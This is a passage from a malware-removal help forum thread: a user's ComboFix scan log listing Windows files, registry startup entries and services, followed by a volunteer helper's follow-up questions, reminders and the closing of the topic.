2012-03-01 00:02 . 2011-12-30 21:54 15009600 ----a-w- c:\windows\SysWow64\nvd3dum.dll
2012-03-01 00:02 . 2011-12-30 21:54 1466176 ----a-w- c:\windows\system32\nvgenco64.dll
2012-02-29 21:00 . 2011-12-30 21:54 3089728 ----a-w- c:\windows\system32\nvsvc64.dll
2012-02-29 21:00 . 2011-12-30 21:54 6074176 ----a-w- c:\windows\system32\nvcpl.dll
2012-02-29 20:59 . 2011-12-30 21:54 889664 ----a-w- c:\windows\system32\nvvsvc.exe
2012-02-29 20:59 . 2011-12-30 21:54 63296 ----a-w- c:\windows\system32\nvshext.dll
2012-02-29 20:59 . 2011-12-30 21:54 2561856 ----a-w- c:\windows\system32\nvsvcr.dll
2012-02-29 20:59 . 2011-12-30 21:54 118080 ----a-w- c:\windows\system32\nvmctray.dll
2012-02-28 21:54 . 2012-01-07 15:17 472808 ----a-w- c:\windows\SysWow64\deployJava1.dll
2012-02-27 12:38 . 2012-02-27 12:38 2782848 ----a-w- c:\windows\system32\drivers\kinonivd.sys
2012-02-27 12:38 . 2012-02-27 12:38 23040 ----a-w- c:\windows\system32\drivers\kinonivad.sys
2012-02-23 09:18 . 2011-12-30 21:45 279656 ------w- c:\windows\system32\MpSigStub.exe
2012-02-22 10:34 . 2012-02-22 10:34 28160 ----a-w- c:\windows\system32\drivers\mcaudrv_x64.sys
2012-02-17 06:38 . 2012-03-14 14:05 1112064 ----a-w- c:\windows\system32\rdpcorets.dll
2012-02-17 06:38 . 2012-03-14 14:05 1031680 ----a-w- c:\windows\system32\rdpcore.dll
2012-02-17 05:34 . 2012-03-14 14:05 826880 ----a-w- c:\windows\SysWow64\rdpcore.dll
2012-02-17 04:58 . 2012-03-14 14:05 210944 ----a-w- c:\windows\system32\drivers\rdpwd.sys
2012-02-17 04:57 . 2012-03-14 14:05 23552 ----a-w- c:\windows\system32\drivers\tdtcp.sys
2012-02-10 06:36 . 2012-03-14 14:06 1544192 ----a-w- c:\windows\system32\DWrite.dll
2012-02-10 05:38 . 2012-03-14 14:06 1077248 ----a-w- c:\windows\SysWow64\DWrite.dll
2012-02-03 04:34 . 2012-03-14 14:06 3145728 ----a-w- c:\windows\system32\win32k.sys
2012-01-25 12:58 . 2012-01-25 12:58 27136 ----a-w- c:\windows\system32\drivers\Motousbnet.sys
2012-01-25 12:57 . 2012-01-25 12:57 30720 ----a-w- c:\windows\system32\drivers\motmodem.sys
2012-01-25 12:57 . 2012-01-25 12:57 9728 ----a-w- c:\windows\system32\drivers\motccgpfl.sys
2012-01-25 12:57 . 2012-01-25 12:57 22016 ----a-w- c:\windows\system32\drivers\motccgp.sys
2012-01-25 06:38 . 2012-03-14 14:05 77312 ----a-w- c:\windows\system32\rdpwsx.dll
2012-01-25 06:38 . 2012-03-14 14:05 149504 ----a-w- c:\windows\system32\rdpcorekmts.dll
2012-01-25 06:33 . 2012-03-14 14:05 9216 ----a-w- c:\windows\system32\rdrmemptylst.exe
.
.
((((((((((((((((((((((((((((( SnapShot@2012-04-16_20.09.14 )))))))))))))))))))))))))))))))))))))))))
.
- 2009-07-14 04:54 . 2012-04-16 20:01 16384 c:\windows\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
+ 2009-07-14 04:54 . 2012-04-17 20:25 16384 c:\windows\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
- 2009-07-14 04:54 . 2012-04-16 20:01 32768 c:\windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
+ 2009-07-14 04:54 . 2012-04-17 20:25 32768 c:\windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
- 2009-07-14 04:54 . 2012-04-16 20:01 16384 c:\windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
+ 2009-07-14 04:54 . 2012-04-17 20:25 16384 c:\windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
+ 2011-12-30 21:59 . 2012-04-17 23:54 34408 c:\windows\system32\wdi\ShutdownPerformanceDiagnostics_SystemData.bin
+ 2009-07-14 05:10 . 2012-04-17 23:54 40680 c:\windows\system32\wdi\BootPerformanceDiagnostics_SystemData.bin
+ 2011-12-30 21:29 . 2012-04-17 23:54 11416 c:\windows\system32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\S-1-5-21-450020240-1868592112-3265372428-1000_UserData.bin
+ 2011-12-30 21:05 . 2012-04-17 23:57 16384 c:\windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
- 2011-12-30 21:05 . 2012-04-14 12:26 16384 c:\windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
- 2011-12-30 21:05 . 2012-04-14 12:26 32768 c:\windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
+ 2011-12-30 21:05 . 2012-04-17 23:57 32768 c:\windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
+ 2009-07-14 04:54 . 2012-04-17 23:57 16384 c:\windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
- 2009-07-14 04:54 . 2012-04-14 12:26 16384 c:\windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
+ 2012-04-18 00:11 . 2012-04-18 00:11 2048 c:\windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat
- 2012-04-16 20:08 . 2012-04-16 20:08 2048 c:\windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat
+ 2012-04-18 00:11 . 2012-04-18 00:11 2048 c:\windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat
- 2012-04-16 20:08 . 2012-04-16 20:08 2048 c:\windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat
+ 2012-04-17 20:25 . 2012-04-17 20:25 262144 c:\windows\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Windows\IETldCache\index.dat
+ 2011-12-31 13:36 . 2012-04-17 19:14 271114 c:\windows\system32\wdi\SuspendPerformanceDiagnostics_SystemData_S3.bin
- 2011-12-31 21:26 . 2012-04-16 19:49 374220 c:\windows\system32\prfh0804.dat
+ 2011-12-31 21:26 . 2012-04-17 21:04 374220 c:\windows\system32\prfh0804.dat
- 2011-12-31 21:59 . 2012-04-16 19:49 390322 c:\windows\system32\prfh0404.dat
+ 2011-12-31 21:59 . 2012-04-17 21:04 390322 c:\windows\system32\prfh0404.dat
- 2011-12-31 21:26 . 2012-04-16 19:49 108472 c:\windows\system32\prfc0804.dat
+ 2011-12-31 21:26 . 2012-04-17 21:04 108472 c:\windows\system32\prfc0804.dat
+ 2011-12-31 21:59 . 2012-04-17 21:04 103558 c:\windows\system32\prfc0404.dat
- 2011-12-31 21:59 . 2012-04-16 19:49 103558 c:\windows\system32\prfc0404.dat
+ 2011-12-31 22:16 . 2012-04-17 21:04 400970 c:\windows\system32\perfh011.dat
- 2011-12-31 22:16 . 2012-04-16 19:49 400970 c:\windows\system32\perfh011.dat
+ 2009-07-14 02:36 . 2012-04-17 21:04 628460 c:\windows\system32\perfh009.dat
- 2009-07-14 02:36 . 2012-04-16 19:49 628460 c:\windows\system32\perfh009.dat
- 2011-12-31 22:16 . 2012-04-16 19:49 110612 c:\windows\system32\perfc011.dat
+ 2011-12-31 22:16 . 2012-04-17 21:04 110612 c:\windows\system32\perfc011.dat
+ 2009-07-14 02:36 . 2012-04-17 21:04 110612 c:\windows\system32\perfc009.dat
- 2009-07-14 02:36 . 2012-04-16 19:49 110612 c:\windows\system32\perfc009.dat
- 2009-07-14 05:01 . 2012-04-16 20:07 515436 c:\windows\ServiceProfiles\LocalService\AppData\Local\FontCache-System.dat
+ 2009-07-14 05:01 . 2012-04-18 00:11 515436 c:\windows\ServiceProfiles\LocalService\AppData\Local\FontCache-System.dat
- 2011-12-31 01:48 . 2012-04-13 19:58 2104020 c:\windows\ServiceProfiles\LocalService\AppData\Local\FontCache-S-1-5-21-450020240-1868592112-3265372428-1000-12288.dat
+ 2011-12-31 01:48 . 2012-04-17 23:44 2104020 c:\windows\ServiceProfiles\LocalService\AppData\Local\FontCache-S-1-5-21-450020240-1868592112-3265372428-1000-12288.dat
+ 2011-12-30 21:56 . 2012-04-18 00:11 60853980 c:\windows\ServiceProfiles\LocalService\AppData\Local\FontCache-S-1-5-21-450020240-1868592112-3265372428-1000-8192.dat
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Pokki"="c:\users\Vincent\AppData\Local\Pokki\v0.252\pokki.exe" [2012-04-13 2540856]
"MotoCast"="c:\program files (x86)\Motorola Mobility\MotoCast\MotoLauncher.lnk" [2012-04-05 2051]
"Facebook Update"="c:\users\Vincent\AppData\Local\Facebook\Update\FacebookUpdate.exe" [2012-04-06 137536]
"SpybotSD TeaTimer"="c:\program files (x86)\Spybot - Search & Destroy\TeaTimer.exe" [2009-03-05 2260480]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"Malwarebytes' Anti-Malware"="c:\program files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe" [2012-04-04 462408]
.
c:\users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Facebook Messenger.lnk - c:\users\Vincent\AppData\Local\Facebook\Messenger\2.0.4478.0\FacebookMessenger.exe [2012-4-5 204288]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa]
Security Packages REG_MULTI_SZ kerberos msv1_0 schannel wdigest tspkg pku2u livessp
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]
@="Driver"
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\run-]
"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
"SunJavaUpdateSched"="c:\program files (x86)\Common Files\Java\Java Update\jusched.exe"
"AdobeCS5ServiceManager"="c:\program files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe" -launchedbylogin
"YouCam Service"="c:\program files (x86)\CyberLink\YouCam\YouCamService.exe" /s
"BCSSync"="c:\program files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
"SwitchBoard"=c:\program files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
.
R2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2010-03-18 130384]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2010-03-18 138576]
R3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-13 253088]
R3 BTCFilterService;USB Networking Driver Filter Service;c:\windows\system32\DRIVERS\motfilt.sys [x]
R3 EagleX64;EagleX64;c:\windows\system32\drivers\EagleX64.sys [x]
R3 KINONI_Wave;Kinoni Audio Source;c:\windows\system32\drivers\kinonivad.sys [x]
R3 kinonivd;Kinoni Video Source;c:\windows\system32\DRIVERS\kinonivd.sys [x]
R3 ManyCam;ManyCam Virtual Webcam;c:\windows\system32\DRIVERS\mcvidrv_x64.sys [x]
R3 mcaudrv_simple;ManyCam Virtual Microphone;c:\windows\system32\drivers\mcaudrv_x64.sys [x]
R3 motandroidusb;Mot ADB Interface Driver;c:\windows\system32\Drivers\motoandroid.sys [x]
R3 motccgp;Motorola USB Composite Device Driver;c:\windows\system32\DRIVERS\motccgp.sys [x]
R3 motccgpfl;MotCcgpFlService;c:\windows\system32\DRIVERS\motccgpfl.sys [x]
R3 Motousbnet;Motorola USB Networking Driver Service;c:\windows\system32\DRIVERS\Motousbnet.sys [x]
R3 NMgamingmsFltr;USB Optical Mouse;c:\windows\system32\drivers\NMgamingms.sys [x]
R3 osppsvc;Office Software Protection Platform;c:\program files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE [2010-01-09 4925184]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys [x]
R3 SwitchBoard;SwitchBoard;c:\program files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [2010-02-19 517096]
R3 Synth3dVsc;Synth3dVsc;c:\windows\system32\drivers\synth3dvsc.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys [x]
R3 tsusbhub;tsusbhub;c:\windows\system32\drivers\tsusbhub.sys [x]
R3 VGPU;VGPU;c:\windows\system32\drivers\rdvgkmd.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [x]
R3 WDC_SAM;WD SCSI Pass Thru driver;c:\windows\system32\DRIVERS\wdcsam64.sys [x]
S0 epfwwfp;epfwwfp;c:\windows\system32\DRIVERS\epfwwfp.sys [x]
S1 ehdrv;ehdrv;c:\windows\system32\DRIVERS\ehdrv.sys [x]
S1 EpfwLWF;Epfw NDIS LightWeight Filter;c:\windows\system32\DRIVERS\EpfwLWF.sys [x]
S1 vwififlt;Virtual WiFi Filter Driver;c:\windows\system32\DRIVERS\vwififlt.sys [x]
S2 AdobeARMservice;Adobe Acrobat Update Service;c:\program files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2012-01-03 63928]
S2 AESTFilters;Andrea ST Filters Service;c:\windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\AESTSr64.exe [2009-03-02 89600]
S2 DeviceMonitorService;DeviceMonitorService;c:\program files (x86)\Motorola Media Link\Lite\NServiceEntry.exe [2012-02-16 87368]
S2 eamonm;eamonm;c:\windows\system32\DRIVERS\eamonm.sys [x]
S2 ekrn;ESET Service;c:\program files\ESET\ESET Smart Security\x86\ekrn.exe [2011-09-22 974944]
S2 MBAMService;MBAMService;c:\program files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [2012-04-04 654408]
S2 MotoHelper;MotoHelper Service;c:\program files (x86)\Motorola\MotoHelper\MotoHelperService.exe [2012-02-01 214896]
S2 nvUpdatusService;NVIDIA Update Service Daemon;c:\program files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe [2012-03-01 2348352]
S2 SBSDWSCService;SBSD Security Center Service;c:\program files (x86)\Spybot - Search & Destroy\SDWinSec.exe [2009-01-26 1153368]
S2 TuneUp.UtilitiesSvc;TuneUp Utilities Service;c:\program files (x86)\TuneUp Utilities 2012\TuneUpUtilitiesService64.exe [2012-04-05 2143552]
S3 clwvd;CyberLink WebCam Virtual Driver;c:\windows\system32\DRIVERS\clwvd.sys [x]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [x]
S3 NETw5s64;Intel® Wireless WiFi Link 5000 Series Adapter Driver for Windows 7 - 64 Bit;c:\windows\system32\DRIVERS\NETw5s64.sys [x]
S3 NVHDA;Service for NVIDIA High Definition Audio Driver;c:\windows\system32\drivers\nvhda64v.sys [x]
S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys [x]
S3 TuneUpUtilitiesDrv;TuneUpUtilitiesDrv;c:\program files (x86)\TuneUp Utilities 2012\TuneUpUtilitiesDriver64.sys [2011-12-12 11856]
.
.
Contents of the 'Scheduled Tasks' folder
.
2012-04-17 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-08 23:44]
.
2012-04-17 c:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-450020240-1868592112-3265372428-1000Core.job
- c:\users\Vincent\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-04-06 22:05]
.
2012-04-17 c:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-450020240-1868592112-3265372428-1000UA.job
- c:\users\Vincent\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-04-06 22:05]
.
.
--------- x86-64 -----------
.
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2009-05-14 318464]
"SysTrayApp"="c:\program files\IDT\WDM\sttray64.exe" [2010-03-23 487424]
"egui"="c:\program files\ESET\ESET Smart Security\egui.exe" [2011-09-22 4035152]
"TNod UP"="c:\users\Vincent\Downloads\TNOD Update\TNod-1.4.1-Final-Portable\TNODUP.exe" [2011-09-18 1892352]
.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost - NetSvcs
UxTuneUp
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local;192.168.*.*
IE: E&xport to Microsoft Excel - c:\progra~2\MICROS~3\Office14\EXCEL.EXE/3000
TCP: DhcpNameServer = 194.168.4.100 194.168.8.100
FF - ProfilePath - c:\users\Vincent\AppData\Roaming\Mozilla\Firefox\Profiles\febeprof.test\
FF - prefs.js: browser.startup.homepage - hxxps://www.facebook.com/|http://www.thepiratebay.org
FF - user.js: network.http.max-persistent-connections-per-server - 4
FF - user.js: nglayout.initialpaint.delay - 600
FF - user.js: content.notify.interval - 600000
FF - user.js: content.max.tokenizing.time - 1800000
FF - user.js: content.switch.threshold - 600000
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-450020240-1868592112-3265372428-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.eml\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="WindowsLiveMail.Email.1"
.
[HKEY_USERS\S-1-5-21-450020240-1868592112-3265372428-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vcf\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="WindowsLiveMail.VCard.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_11_2_202_233_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_11_2_202_233_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_2_202_233.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.11"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_2_202_233.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_2_202_233.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_2_202_233.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}]
@Denied: (A 2) (Everyone)
@="IFlashBroker4"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}]
@Denied: (A) (Everyone)
"Solution"="{15727DE6-F92D-4E46-ACB4-0E2C58B31A18}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3]
@Denied: (A) (Everyone)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3\0]
"Key"="ActionsPane3"
"Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\ActionsPane3.xsd"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
"MSCurrentCountry"=dword:000000b5
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0001\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
------------------------ Other Running Processes ------------------------
.
c:\program files (x86)\Bonjour\mDNSResponder.exe
c:\windows\SysWOW64\PnkBstrA.exe
c:\program files (x86)\Motorola\MotoHelper\MotoHelperAgent.exe
.
**************************************************************************
.
Completion time: 2012-04-18 01:26:27 - machine was rebooted
ComboFix-quarantined-files.txt 2012-04-18 00:26
ComboFix2.txt 2012-04-17 23:51
ComboFix3.txt 2012-04-16 20:14
.
Pre-Run: 103,543,943,168 bytes free
Post-Run: 103,475,433,472 bytes free
.
- - End Of File - - 0BA67881C632FB676EEF869AF99E40A6

Thanks
Vincent

#8 gringo_pr (Malware Response Team)

Posted 17 April 2012 - 08:05 PM

In which browsers does this happen - check all installed


gringo
I Close My Topics If You Have Not Replied In 5 Days If You Will Be Longer Please Let Me Know

If I Have Not Replied To One Of My Topics In 48 Hrs Please Bump The Topic



My help is free, however, if you wish to make a small donation to show your appreciation or to help me continue the fight against Malware, then click here. Don't worry every little bit helps.

Proud Graduate Of Malware Removal University

#9 gringo_pr (Malware Response Team)

Posted 19 April 2012 - 11:24 PM

Hello


Just checking in on you as it has been a couple of days since I have heard from you.

Are you having any troubles or just need more time?




Gringo

#10 vinnie946 (Topic Starter)

Posted 20 April 2012 - 04:32 AM

Hi, I am a bit busy right now and I'll reply to you tonight.

Thanks

#11 gringo_pr (Malware Response Team)

Posted 20 April 2012 - 07:15 AM

no problem


gringo

#12 gringo_pr (Malware Response Team)

Posted 23 April 2012 - 12:05 AM

Hello


Just checking in on you as it has been a couple of days since I have heard from you.

Are you having any troubles or just need more time?




Gringo

#13 gringo_pr (Malware Response Team)

Posted 26 April 2012 - 01:01 AM

Hello

48 Hour bump

It has been more than 48 hours since my last post.

  • do you still need help with this?
  • do you need more time?
  • are you having problems following my instructions?
  • if after 48hrs you have not replied to this thread then it will have to be closed!

Gringo

#14 gringo_pr (Malware Response Team)

Posted 28 April 2012 - 11:09 PM

Due to the lack of feedback, this topic is now closed. In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days. Please include a link to your topic in the Private Message. Thank you.
